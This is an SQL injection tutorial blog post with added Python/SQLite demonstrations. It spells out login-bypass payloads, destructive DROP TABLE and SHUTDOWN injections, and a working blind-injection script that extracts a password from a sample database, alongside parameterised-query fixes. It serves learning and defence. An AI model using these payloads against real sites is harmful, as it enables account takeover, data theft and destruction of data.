Wednesday, 17 December 2014

SQL Injections (tutorial)

                           SQL Injections

SQL stands for Structured Query Language. It is the language a website uses to talk to its database. The basic SQL statements are simple and can be learned very quickly. For example, the query


                                      SELECT * FROM users WHERE name = 'username'


will return every row of the users table whose name is 'username'. SQL keywords are not case-sensitive, but by convention they are written in capital letters.

PHP pages (like these) build SQL queries and send them to the database. When what a visitor types is pasted straight into those queries, the queries can be manipulated. That is an SQL injection.

                                         How to do this?

Let's start with a very simple SQL injection. Say there is a table called "users" with a field called UserID, and a script on the site that lets you enter a UserID and fetches the details of the person who owns it. The SQL for it is as follows:
                           
                                         SELECT * FROM `users` WHERE UserID= $ID    
     
The * means return every column of the matching rows. $ID is whatever you enter into the text box on the site; note that it is not wrapped in quotes. Now say that instead of entering a number, you enter the word UserID. The script then runs the following query:    

                                       SELECT * FROM `users` WHERE UserID= UserID

This is just like a 1=1 SQL injection: UserID is always equal to itself, so the condition is true for every row, and the page shows you the details of every single person registered on the site.

In simple terms, what you enter becomes part of the SQL query. That means you can type SQL into the site and it will be run as part of the real query.
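The numeric injection above, run for real. This is an added example and not code from the original post: it uses Python and an in-memory SQLite database as a stand-in for the PHP/MySQL script, the users rows are constructed sample data, and the function names are my own. The vulnerable function pastes the input into the query text exactly as the $ID script does; the safe version insists on an integer and passes it as a bound parameter.

```python
import sqlite3

# Constructed sample data standing in for the site's users table (not the page's own data).
SAMPLE_USERS = [
    (1, "Admin", "s3cret"),
    (2, "alice", "hunter2"),
    (3, "bob", "letmein"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (UserID INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query(user_input: str) -> str:
    """The page's script: $ID is pasted into the query text with no quotes around it."""
    return "SELECT * FROM users WHERE UserID = " + user_input


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    """Run the query exactly as the vulnerable script would."""
    return conn.execute(build_query(user_input)).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_input: str) -> list:
    """Hardened version: insist on an integer, then pass it as a bound parameter.

    The value travels to the database separately from the SQL text, so it is
    never parsed as part of the query.
    """
    try:
        user_id = int(user_input)
    except ValueError:
        return []  # "UserID", "0 OR 1=1" and friends are rejected before any SQL runs
    return conn.execute("SELECT * FROM users WHERE UserID = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_query("UserID"))                           # SELECT * FROM users WHERE UserID = UserID
    print(len(lookup_vulnerable(db, "2")), "row(s)")       # 1
    print(len(lookup_vulnerable(db, "UserID")), "row(s)")  # 3: the condition is true for every row
    print(len(lookup_safe(db, "UserID")), "row(s)")        # 0
```

Typing "0 OR 1=1" into the vulnerable version returns all three rows as well; any expression that is true for every row does the job once the input is part of the SQL text.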


Now let's try another SQL injection. This is one of the most commonly tried on sites. If there is a login box asking for a username and password (my one is protected), the username and password are compared with those stored in the database. Say the SQL is this:

                                     SELECT * FROM users WHERE username = $username;

                                    SELECT * FROM users WHERE password = $password;

$username and $password again being the values typed into the PHP form. Now suppose the following is entered into the username and password boxes: 

'Username' or 1=1 

'Password' or 1=1 

The resulting SQL queries are:
                             
                                            SELECT * FROM users WHERE username = 'Username' or 1=1

                                           SELECT * FROM users WHERE password = 'Password' or 1=1;

The trick is the or 1=1 at the end. 1 is always equal to 1, so the WHERE clause is true for every row and the query returns every user, whatever the username and password were. Most login scripts simply take the first row returned, which is usually the first account created, and on many sites that is the admin. That logs you in with full admin control over the site. 
String terminator

In SQL, a double dash (--) starts a comment that runs to the end of the line. Adding a double dash to the end of your SQL injection makes the database ignore everything after it. (In MySQL the double dash has to be followed by a space; writing it as "-- " works everywhere.)

This is useful for making the server ignore the closing quotation mark that the script adds after your input. E.g. if the PHP looked like this:
$sql = "SELECT * FROM `users` WHERE username='" . $_POST['uname'] . "'";
($_POST is how PHP reads the values submitted by a form.) Here the input lands between two single quotes, so entering ' or 1=1 on its own leaves a stray quote and a syntax error. Entering it with a double dash, ' or 1=1-- , solves this problem. The SQL statement now looks like this: 

SELECT * FROM `users` WHERE username='' or 1=1-- '
Because of the double dash, the trailing ' is treated as a comment and ignored, so the query is valid. Again 1 is always equal to 1, so every user is returned and the script logs you in as the first one, which is usually the admin.
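The comment trick from this section, shown against a real query engine. This is an added example, not code from the original post: Python and SQLite stand in for PHP and MySQL, the two users are constructed sample rows, and the function names are mine. It shows that the bare ' or 1=1 payload is rejected as a syntax error because of the dangling quote, while the same payload with "-- " on the end is accepted and logs the attacker in as the first row.

```python
import sqlite3

# Constructed sample rows (not the page's data); the admin was created first, as on most sites.
SAMPLE_USERS = [("Admin", "s3cret"), ("alice", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(uname: str) -> str:
    """The page's PHP query: the form value lands between two single quotes."""
    return "SELECT * FROM users WHERE username='" + uname + "'"


def query_is_valid(conn: sqlite3.Connection, uname: str) -> bool:
    """True if the database accepts the assembled query, False on a syntax error."""
    try:
        conn.execute(build_query(uname))
    except sqlite3.OperationalError:
        return False
    return True


def logged_in_as(conn: sqlite3.Connection, uname: str):
    """Mimic the login script: the first row the query returns is the logged-in user."""
    rows = conn.execute(build_query(uname)).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    # Without a comment marker the script's closing quote is left dangling: syntax error.
    print(build_query("' or 1=1"), "->", query_is_valid(db, "' or 1=1"))        # False
    # With "-- " the dangling quote sits inside a comment. SQLite accepts "--" with or
    # without a following space; MySQL needs the space, so always send "-- ".
    print(build_query("' or 1=1-- "), "->", query_is_valid(db, "' or 1=1-- "))  # True
    print(logged_in_as(db, "' or 1=1-- "))  # Admin: every row matched and the script took the first
```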
The Drop / Create Commands
    Using DROP isn't really recommended. It is another way of deleting: DROP TABLE deletes a whole table, and DROP DATABASE deletes a whole database. If the script passes your input to the database unsanitised and runs more than one statement at a time, entering the command:

a'; DROP TABLE `users`; -- 

into a username/password box will search the database for the username a and then delete the whole users table afterwards. This only works when the database interface accepts several statements in one call (PHP's mysql_query does not; mysqli_multi_query and Microsoft SQL Server do). It is also purely destructive and usually doesn't benefit you in any way. 

The CREATE command, as you'd expect, creates a new table in the database. A table needs at least one column, so for example
a'; CREATE TABLE `hello` (id INT); -- 

will create a new table in the database called hello. Again, this is of no use to you.
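Whether the DROP payload does anything depends on the database API, not on the SQL. The following added example (not from the original post; Python and SQLite stand in for PHP and MySQL, the single users row is constructed, the function names are mine) sends the same stacked payload through two Python sqlite3 calls: execute(), which compiles one statement and refuses the rest, much like PHP's mysql_query, and executescript(), which runs every statement in the string, much like mysqli_multi_query.

```python
import sqlite3

# The page's payload (identifier written without MySQL backticks so SQLite and MySQL both accept it).
PAYLOAD = "a'; DROP TABLE users; -- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 's3cret')")  # constructed row
    return conn


def build_query(uname: str) -> str:
    """Same unsanitised login query as before: input pasted between single quotes."""
    return "SELECT * FROM users WHERE username='" + uname + "'"


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    """Check SQLite's catalogue (sqlite_master plays the role of INFORMATION_SCHEMA)."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


def single_statement_api(conn: sqlite3.Connection, uname: str) -> str:
    """cursor.execute() compiles one statement and refuses anything left over.

    Returns 'refused' when the driver rejects the stacked text, 'ran' otherwise.
    The exception class changed between Python versions, so both are caught.
    """
    try:
        conn.execute(build_query(uname)).fetchall()
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return "refused"
    return "ran"


def multi_statement_api(conn: sqlite3.Connection, uname: str) -> bool:
    """executescript() runs every statement in the string.

    Returns whether the users table is still there afterwards.
    """
    conn.executescript(build_query(uname))
    return table_exists(conn, "users")


if __name__ == "__main__":
    db = make_db()
    print(build_query(PAYLOAD))
    print("execute():", single_statement_api(db, PAYLOAD))          # refused
    print("table still there:", table_exists(db, "users"))          # True
    print("table after executescript():", multi_statement_api(db, PAYLOAD))  # False
```

The lesson for a defender is that "my driver only runs one statement" is a property of the driver, not of the query; the text is still injectable, and a later switch of API (or a database such as SQL Server that batches by default) turns the same bug into a destructive one.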

 
                        Shutdown

This is another very malicious command. Microsoft SQL Server has a SHUTDOWN statement, and if the site's database account is allowed to run it (membership of the sysadmin or serveradmin server role) and the script accepts stacked statements, the database server stops, taking the whole site offline until someone restarts it. This is rarely ever successful, because the web application's account should not have that permission, but for example if you entered the username:
'; shutdown with nowait; --
and left the password field blank when you tried to login, the database server would shut down immediately.

 

                                   Wild cards

To make the chance of guessing a username or password even higher, there are also wildcards. The most popular is the % sign, which in a LIKE pattern matches any run of characters (including none); an underscore (_) matches exactly one character. Used with a LIKE statement this makes things a lot easier, because each query answers a yes/no question about the password.

For example, does the admin's password have an 'm' in it?

SELECT * FROM users WHERE name='Admin' AND password LIKE '%m%'
does it start with m?

SELECT * FROM users WHERE name='Admin' AND password LIKE 'm%'
does it begin mo?
SELECT * FROM users WHERE name='Admin' AND password LIKE 'mo%'
is the third letter an e?

SELECT * FROM users WHERE name='Admin' AND password LIKE '__e%'
Note that LIKE is not case-sensitive under MySQL's default collations, so these questions cannot tell 'm' from 'M'. To ask them through a login box instead of directly at the database, they are wrapped in EXISTS, as shown in the next section.



                     Finding out Info

If you don't know anything at all about the structure of the database, these two queries (written for MySQL) should help. Say you don't know the name of the database. Entering this as the username checks whether the name of the current database contains the letter 't':
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%t%') AND ''='
The AND ''=' at the end is completed by the script's own closing quote, so the whole statement stays valid without a comment marker. If the page responds as it does for a valid user, the answer is yes; repeat with other letters and positions until you have the database name. Once you have accomplished this you will need to know the table names inside the database. To check, use the following (with the database name you found in place of 'test'); it checks whether there is a table called 'users':
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='
Hopefully showing a positive result.
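The wildcard questions from the previous section and the EXISTS probes from this one are the two halves of one technique, usually called boolean-based blind injection: the attacker only sees whether the page behaved as it does for a valid user, and asks one yes/no question per request. The example below is added here and is not code from the original post. It uses Python and SQLite in place of PHP and MySQL (so sqlite_master stands in for INFORMATION_SCHEMA.TABLES, and there is no database() equivalent), the users rows are constructed sample data, and the function names are mine. It automates the page's "does it begin mo?" probes into a loop that recovers the admin password one character at a time, using the page's own ' OR ... AND ''=' payload shape.

```python
import sqlite3
from typing import Callable

# Constructed sample data (not the page's): the secret to recover is Admin's password.
SAMPLE_USERS = [("Admin", "m0nkey"), ("alice", "hunter2")]
# LIKE is case-insensitive, so only lowercase is probed; '%', '_' and "'" are left out
# because they would need escaping inside the LIKE pattern.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_found(conn: sqlite3.Connection, uname: str) -> bool:
    """The page's vulnerable lookup: input pasted between quotes, True if any row comes back.

    This yes/no is all the attacker gets to see (the 'user found' page or not).
    """
    rows = conn.execute("SELECT * FROM users WHERE name='" + uname + "'").fetchall()
    return len(rows) > 0


def ask(oracle: Callable[[str], bool], condition: str) -> bool:
    """Wrap a SQL condition in the page's payload shape:  ' OR <condition> AND ''=

    The script's own closing quote completes the final ''='' so no comment marker is needed.
    """
    return oracle("' OR " + condition + " AND ''='")


def table_exists(oracle: Callable[[str], bool], table: str) -> bool:
    """The page's INFORMATION_SCHEMA.TABLES probe; SQLite keeps its catalogue in sqlite_master."""
    cond = f"EXISTS(SELECT 1 FROM sqlite_master WHERE type='table' AND name='{table}')"
    return ask(oracle, cond)


def recover_password(oracle: Callable[[str], bool], user: str, max_len: int = 32) -> str:
    """Extend the known prefix one character at a time with LIKE 'prefix<c>%' probes.

    Costs at most len(CHARSET) requests per character.
    """
    found = ""
    for _ in range(max_len):
        for c in CHARSET:
            cond = (f"EXISTS(SELECT 1 FROM users WHERE name='{user}' "
                    f"AND password LIKE '{found + c}%')")
            if ask(oracle, cond):
                found += c
                break
        else:
            break  # nothing extends the prefix: end of password (or a character outside CHARSET)
    return found


if __name__ == "__main__":
    db = make_db()
    oracle = lambda uname: user_found(db, uname)
    print("users table exists:", table_exists(oracle, "users"))    # True
    print("orders table exists:", table_exists(oracle, "orders"))  # False
    print("Admin password:", recover_password(oracle, "Admin"))     # m0nkey
```

Because LIKE folds case, what comes back is the password with its letters lower-cased; a real run would finish with a direct login attempt over the case variants, or use a case-sensitive comparison (BINARY in MySQL) once the length is known.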
 

                             Magic Quotes

Because of the problems SQL injections can produce, a lot of sites use PHP's magic quotes (magic_quotes_gpc). These simply add a backslash (\) before every quotation mark (' ") entered into a form, so the quote no longer ends the string in the query and your injection is treated as a literal username. It can sometimes be hard to tell whether a site is using magic quotes or not, so try the SQL and see. Two caveats: magic quotes only protect quoted strings, so an unquoted number like the UserID example above is still injectable; and they were deprecated in PHP 5.3 and removed in PHP 5.4. Prepared statements with bound parameters are the proper fix.
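The limit of quote-escaping, demonstrated. This is an added example and not code from the original post: Python and SQLite stand in for PHP and MySQL, the users rows are constructed, and the function names are mine. Magic quotes escaped with a backslash, which is MySQL syntax; SQLite and standard SQL escape a quote by doubling it, so the escaping function here doubles quotes to get the same effect. The string-context payload is neutralised, the numeric-context payload from the first section is untouched, and a type check plus a bound parameter handles both.

```python
import sqlite3

# Constructed sample rows, not the page's data.
SAMPLE_USERS = [(1, "Admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "letmein")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (UserID INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_quotes(value: str) -> str:
    """Stand-in for magic quotes.

    PHP put a backslash before each quote (MySQL syntax); SQLite and standard SQL
    escape a quote by doubling it, so that is what is done here. Either way the
    quote stops terminating the string literal.
    """
    return value.replace("'", "''")


def names_by_name(conn: sqlite3.Connection, uname: str) -> list:
    """Quoted-string context: escaping keeps the whole input inside the literal."""
    sql = "SELECT name FROM users WHERE name='" + escape_quotes(uname) + "'"
    return [row[0] for row in conn.execute(sql)]


def names_by_id(conn: sqlite3.Connection, user_id: str) -> list:
    """Numeric context from the first section: there is no quote to escape, so the
    same escaping leaves the injection completely intact."""
    sql = "SELECT name FROM users WHERE UserID=" + escape_quotes(user_id)
    return [row[0] for row in conn.execute(sql)]


def names_by_id_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """The real fix: type-check and bind. int() raises ValueError on '1 OR 1=1'."""
    cur = conn.execute("SELECT name FROM users WHERE UserID=?", (int(user_id),))
    return [row[0] for row in cur]


if __name__ == "__main__":
    db = make_db()
    print(names_by_name(db, "' OR 1=1-- "))  # []: the payload became the literal string ' OR 1=1--
    print(names_by_id(db, "1 OR 1=1"))       # ['Admin', 'alice', 'bob']: escaping did nothing
    print(names_by_id_safe(db, "2"))         # ['alice']
```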

 

This is just the start of basic SQL injection. The combinations of injections to try are endless. For more, check out
 Wikipedia's article and research further, for example the ALTER and UNION commands. Learning SQL itself would also benefit you.
